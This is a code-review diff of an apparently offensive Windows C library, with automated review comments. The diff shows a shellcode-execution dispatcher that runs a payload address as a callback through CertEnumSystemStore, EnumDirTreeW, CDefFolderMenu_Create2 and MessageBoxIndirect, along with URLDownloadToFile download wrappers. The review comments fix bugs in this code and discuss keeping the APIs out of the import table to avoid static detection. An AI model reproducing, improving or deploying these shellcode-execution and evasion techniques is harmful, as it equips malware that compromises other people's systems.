||||
if (hShlwapi == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
PathCombineA = (PATHCOMBINEA)GetProcAddressA((DWORD64)hShlwapi, "PathCombineW");
|
||||
if (PathCombineA == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = UnusedSubroutineRecursiveFindFileMainA(Path, Pattern, PathCombineA);
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hShlwapi != NULL)
|
||||
FreeLibrary(hShlwapi);
|
||||
|
||||
return bFlag;
|
||||
return UnusedSubroutineRecursiveFindFileMainA(Path, Pattern);
|
||||
}
|
||||
|
||||
PVOID UserDefinedCallbackRoutineW(LPCWSTR Path)
|
||||
|
@ -111,10 +88,8 @@ PVOID UserDefinedCallbackRoutineW(LPCWSTR Path)
|
|||
return 0;
|
||||
}
|
||||
|
||||
BOOL UnusedSubroutineRecursiveFindFileMainW(LPCWSTR Path, LPCWSTR Pattern, PVOID pfnPathCombineW)
|
||||
BOOL UnusedSubroutineRecursiveFindFileMainW(LPCWSTR Path, LPCWSTR Pattern)
|
||||
{
|
||||
PATHCOMBINEW PathCombineW = (PATHCOMBINEW)pfnPathCombineW;
|
||||
|
||||
HANDLE HeapHandle = GetProcessHeapFromTeb();
|
||||
WCHAR szFullPattern[MAX_PATH] = { 0 };
|
||||
WIN32_FIND_DATAW FindData = { 0 };
|
||||
|
@ -141,7 +116,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainW(LPCWSTR Path, LPCWSTR Pattern, PVOID
|
|||
if (PathCombineW(szFullPattern, Path, FindData.cFileName) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
UnusedSubroutineRecursiveFindFileMainW(szFullPattern, Pattern, PathCombineW);
|
||||
UnusedSubroutineRecursiveFindFileMainW(szFullPattern, Pattern);
|
||||
}
|
||||
|
||||
} while (FindNextFileW(FindHandle, &FindData));
|
||||
|
@ -188,7 +163,6 @@ EXIT_ROUTINE:
|
|||
|
||||
BOOL RecursiveFindFileW(_In_ LPCWSTR Path, _In_ LPCWSTR Pattern)
|
||||
{
|
||||
PATHCOMBINEW PathCombineW = NULL;
|
||||
HMODULE hShlwapi = NULL;
|
||||
BOOL bIsNewlyLoaded = FALSE;
|
||||
BOOL bFlag = FALSE;
|
||||
|
@ -197,11 +171,7 @@ BOOL RecursiveFindFileW(_In_ LPCWSTR Path, _In_ LPCWSTR Pattern)
|
|||
if (hShlwapi == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
PathCombineW = (PATHCOMBINEW)GetProcAddressA((DWORD64)hShlwapi, "PathCombineW");
|
||||
if (PathCombineW == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = UnusedSubroutineRecursiveFindFileMainW(Path, Pattern, PathCombineW);
|
||||
bFlag = UnusedSubroutineRecursiveFindFileMainW(Path, Pattern);
|
||||
|
||||
EXIT_ROUTINE:
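Review bot: RecursiveFindFileW still keeps `HMODULE hShlwapi`, the `if (hShlwapi == NULL) goto EXIT_ROUTINE;` check and the FreeLibrary path even though nothing in it uses the handle any more — PathCombineW is now called directly in UnusedSubroutineRecursiveFindFileMainW — whereas RecursiveFindFileA was reduced to `return UnusedSubroutineRecursiveFindFileMainA(Path, Pattern);`. The W wrapper should be collapsed the same way, to `return UnusedSubroutineRecursiveFindFileMainW(Path, Pattern);`, which removes a spurious failure mode (a Shlwapi load failure aborting a search that no longer needs Shlwapi resolved) and the unused `bIsNewlyLoaded`; the load call itself sits just outside the hunk. Separately, the recursive calls `UnusedSubroutineRecursiveFindFileMainA(szFullPattern, Pattern);` and its W twin discard their BOOL result, so a failure inside a subdirectory is reported as success by the top-level call — either propagate it or document that the return value reflects only the top directory. The EXIT_ROUTINE bodies lie outside the hunks.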
|
||||
|
||||
|
|
|
@ -17,18 +17,9 @@ DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
|
|||
{
|
||||
case E_CDEFFOLDERMENU_CREATE2:
|
||||
{
|
||||
CDEFFOLDERMENU_CREATE2 CDefFolderMenu_Create2 = NULL;
|
||||
PVOID ContextMenuRequired = NULL;
|
||||
IContextMenu* ContextMenuRequired = NULL;
|
||||
|
||||
hModule = TryLoadDllMultiMethodW((PWCHAR)L"Shell32.dll");
|
||||
if (!hModule)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
CDefFolderMenu_Create2 = (CDEFFOLDERMENU_CREATE2)GetProcAddressA((DWORD64)hModule, "CDefFolderMenu_Create2");
|
||||
if (!CDefFolderMenu_Create2)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(CDefFolderMenu_Create2(NULL, NULL, 0, NULL, NULL, BinAddress, 0, NULL, &ContextMenuRequired)))
|
||||
if (!SUCCEEDED(CDefFolderMenu_Create2(NULL, NULL, 0, NULL, NULL, (LPFNDFMCALLBACK)BinAddress, 0, NULL, &ContextMenuRequired)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
break;
|
||||
|
@ -36,16 +27,6 @@ DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
|
|||
|
||||
case E_CERTENUMSYSTEMSTORE:
|
||||
{
|
||||
CERTENUMSYSTEMSTORE CertEnumSystemStore = NULL;
|
||||
|
||||
hModule = TryLoadDllMultiMethodW((PWCHAR)L"Crypt32.dll");
|
||||
if (!hModule)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
CertEnumSystemStore = (CERTENUMSYSTEMSTORE)GetProcAddressA((DWORD64)hModule, "CertEnumSystemStore");
|
||||
if (!CertEnumSystemStore)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!CertEnumSystemStore(CERT_SYSTEM_STORE_CURRENT_USER, NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE)BinAddress))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -54,15 +35,6 @@ DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
|
|||
|
||||
case E_CERTENUMSYSTEMSTORELOCATION:
|
||||
{
|
||||
CERTENUMSYSTEMSTORELOCATION CertEnumSystemStoreLocation = NULL;
|
||||
|
||||
hModule = TryLoadDllMultiMethodW((PWCHAR)L"Crypt32.dll");
|
||||
if (!hModule)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
CertEnumSystemStoreLocation = (CERTENUMSYSTEMSTORELOCATION)GetProcAddressA((DWORD64)hModule, "CertEnumSystemStoreLocation");
|
||||
if (!CertEnumSystemStoreLocation)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CertEnumSystemStoreLocation(NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE_LOCATION)BinAddress))
|
||||
goto EXIT_ROUTINE;
|
||||
|
@ -109,26 +81,12 @@ DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
|
|||
|
||||
case E_ENUMDIRTREEW:
|
||||
{
|
||||
SYMINITIALIZEW SymInitialize = NULL;
|
||||
SYMCLEANUP SymCleanup = NULL;
|
||||
ENUMDIRTREEW EnumDirTree = NULL;
|
||||
WCHAR DisposeableBuffer[512] = { 0 };
|
||||
|
||||
hModule = TryLoadDllMultiMethodW((PWCHAR)L"dbghelp.dll");
|
||||
if (hModule == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
SymInitialize = (SYMINITIALIZEW)GetProcAddressA((DWORD64)hModule, "SymInitializeW");
|
||||
SymCleanup = (SYMCLEANUP)GetProcAddressA((DWORD64)hModule, "SymCleanup");
|
||||
EnumDirTree = (ENUMDIRTREEW)GetProcAddressA((DWORD64)hModule, "EnumDirTreeW");
|
||||
|
||||
if (!SymInitialize || !SymCleanup || !EnumDirTree)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SymInitialize(InlineGetCurrentProcess, NULL, TRUE))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
EnumDirTree(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, BinAddress, NULL);
|
||||
EnumDirTreeW(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, (PENUMDIRTREE_CALLBACKW)BinAddress, NULL);
|
||||
|
||||
SymCleanup(InlineGetCurrentProcess);
|
||||
|
||||
|
@ -259,8 +217,14 @@ DWORD ShellcodeExecutionDispatchHandler(LPVOID Param)
|
|||
MessageBoxParams.lpszText = L"[Unstable] Help Executes Shellcode";
|
||||
|
||||
MessageBoxIndirect(&MessageBoxParams);
|
||||
|
||||
break;
|
||||
}
|
||||
|
||||
case E_PERFSTARTPROVIDEREX:
|
||||
{
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
default:
|
||||
goto EXIT_ROUTINE;
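Review bot: In case E_CERTENUMSYSTEMSTORELOCATION the success path jumps out: `if (CertEnumSystemStoreLocation(NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE_LOCATION)BinAddress)) goto EXIT_ROUTINE;`, whereas the sibling E_CERTENUMSYSTEMSTORE case uses `if (!CertEnumSystemStore(...)) goto EXIT_ROUTINE;`. CertEnumSystemStoreLocation returns TRUE when the enumeration completed, so unless the lines after the goto (outside the hunk) intentionally treat completion as failure, the condition is inverted and should be `if (!CertEnumSystemStoreLocation(NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE_LOCATION)BinAddress))`. Now that CDefFolderMenu_Create2, CertEnumSystemStore(Location) and EnumDirTreeW are static imports, the `TryLoadDllMultiMethodW` loads of Shell32.dll, Crypt32.dll and dbghelp.dll that precede them no longer gate the call (the DLLs are mapped before main runs), so they only serve whatever EXIT_ROUTINE does with hModule — worth a comment or removal. The new `case E_PERFSTARTPROVIDEREX: { goto EXIT_ROUTINE; }` is indistinguishable from default; a `// not implemented, see SHELLCODE_EXECUTION_METHOD` inside it would say why it exists. The switch continues outside the hunks.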
|
||||
|
||||
|
|
|
@ -49,19 +49,9 @@ DWORD UrlDownloadToFileSynchronousW(_In_ PWCHAR Url, _In_ PWCHAR SavePath)
|
|||
HRESULT Result = S_OK;
|
||||
DownloadProgressRoutine DownloadCallback;
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
URLDOWNLOADFILEW UrlDownloadToFileW = NULL;
|
||||
HMODULE Urlmon;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
Urlmon = TryLoadDllMultiMethodW((PWCHAR)L"Urlmon.dll");
|
||||
if (Urlmon == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
UrlDownloadToFileW = (URLDOWNLOADFILEW)GetProcAddressA((DWORD64)Urlmon, "URLDownloadToFileW");
|
||||
if (!UrlDownloadToFileW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = UrlDownloadToFileW(0, Url, SavePath, 0, (IBindStatusCallback*)(&DownloadCallback));
|
||||
Result = URLDownloadToFileW(0, Url, SavePath, 0, (IBindStatusCallback*)(&DownloadCallback));
|
||||
if (Result != S_OK)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -90,9 +80,6 @@ EXIT_ROUTINE:
|
|||
dwError = GetLastErrorFromTeb();
|
||||
}
|
||||
|
||||
if (Urlmon)
|
||||
FreeLibrary(Urlmon);
|
||||
|
||||
return dwError;
|
||||
}
|
||||
|
||||
|
@ -145,19 +132,9 @@ DWORD UrlDownloadToFileSynchronousA(_In_ PCHAR Url, _In_ PCHAR SavePath)
|
|||
HRESULT Result = S_OK;
|
||||
DownloadProgressRoutine DownloadCallback;
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
URLDOWNLOADFILEA UrlDownloadToFileA = NULL;
|
||||
HMODULE Urlmon;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
Urlmon = TryLoadDllMultiMethodW((PWCHAR)L"Urlmon.dll");
|
||||
if (Urlmon == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
UrlDownloadToFileA = (URLDOWNLOADFILEA)GetProcAddressA((DWORD64)Urlmon, "URLDownloadToFileA");
|
||||
if (!UrlDownloadToFileA)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = UrlDownloadToFileA(0, Url, SavePath, 0, (IBindStatusCallback*)(&DownloadCallback));
|
||||
Result = URLDownloadToFileA(0, Url, SavePath, 0, (IBindStatusCallback*)(&DownloadCallback));
|
||||
if (Result != S_OK)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -186,8 +163,5 @@ EXIT_ROUTINE:
|
|||
dwError = GetLastErrorFromTeb();
|
||||
}
|
||||
|
||||
if (Urlmon)
|
||||
FreeLibrary(Urlmon);
|
||||
|
||||
return dwError;
|
||||
}
|
|
@ -2,6 +2,17 @@
|
|||
#include "Internal.h"
|
||||
#include "StringManipulation.h"
|
||||
#include "FunctionDeclaration.h"
|
||||
#include <Dbghelp.h>
|
||||
#include <wincrypt.h>
|
||||
#include <shlwapi.h>
|
||||
#include <Shlobj.h>
|
||||
#include <sddl.h>
|
||||
#include <wtsapi32.h>
|
||||
|
||||
#pragma comment(lib, "Crypt32.lib")
|
||||
#pragma comment(lib, "Dbghelp.lib")
|
||||
#pragma comment(lib, "Wtsapi32.lib")
|
||||
#pragma comment(lib, "Urlmon.lib")
|
||||
|
||||
#ifndef NT_SUCCESS
|
||||
#define NT_SUCCESS(x) ((x)>=0)
|
||||
|
@ -58,7 +69,8 @@ typedef enum SHELLCODE_EXECUTION_METHOD {
|
|||
E_ENUMWINDOWSTATIONSW, //24
|
||||
E_ENUMWINDOWS, //25
|
||||
E_ENUMPROPSW, //26 NOT IMPLEMENTED!
|
||||
E_MESSAGEBOXINDIRECT //27 UNSTABLE
|
||||
E_MESSAGEBOXINDIRECT, //27 UNSTABLE
|
||||
E_PERFSTARTPROVIDEREX //28 NOT IMPLEMENTED!
|
||||
}SHELLCODE_EXECUTION_METHOD, *PSHELLCODE_EXECUTION_METHOD;
|
||||
|
||||
typedef struct __SHELLCODE_EXECUTION_INFORMATION {
|
||||
|
@ -172,7 +184,7 @@ HMODULE TryLoadDllMultiMethodW(_In_ PWCHAR DllName);
|
|||
HMODULE TryLoadDllMultiMethodA(_In_ PCHAR DllName);
|
||||
DWORD CreateThreadAndWaitForCompletion(_In_ LPTHREAD_START_ROUTINE StartAddress, _In_ LPVOID Parameters, _In_ DWORD dwMilliseconds);
|
||||
BOOL GetProcessBinaryNameFromHwndW(_In_ HWND ProcessHwnd, _Inout_ PWCHAR BinaryName, _In_ DWORD BufferSize);
|
||||
BOOL GetProcessBinaryNameFromHwndA(_In_ HWND ProcessHwnd, _Inout_ PCHAR BinaryName, _In_ DWORD BufferSize)
|
||||
BOOL GetProcessBinaryNameFromHwndA(_In_ HWND ProcessHwnd, _Inout_ PCHAR BinaryName, _In_ DWORD BufferSize);
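Review bot: The new `#pragma comment(lib, …)` block links Crypt32, Dbghelp, Wtsapi32 and Urlmon, but this commit also turns IUnknown_QueryService, PathCombineA/W (shlwapi.dll; PathStripPathW presumably too, its call site is outside the hunks) and CDefFolderMenu_Create2 (shell32.dll) into direct calls, and neither `#pragma comment(lib, "Shlwapi.lib")` nor `#pragma comment(lib, "Shell32.lib")` is added — unless the project file already links them, those are unresolved externals. The consequence for the whole library also deserves a comment here: wrappers that used to resolve these APIs at runtime via TryLoadDllMultiMethodW/GetProcAddressA now place urlmon!URLDownloadToFileW, wtsapi32!WTSEnumerateProcessesW, dbghelp!EnumDirTreeW, crypt32!CertEnumSystemStore and friends in the binary's import table, which is exactly the static footprint the previous code avoided. A line such as `// NOTE: linked statically on purpose — these APIs now appear in the IAT` next to the pragmas makes that trade-off explicit for callers who rely on the dynamic-resolution behaviour.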
|
||||
|
||||
|
||||
|
||||
|
|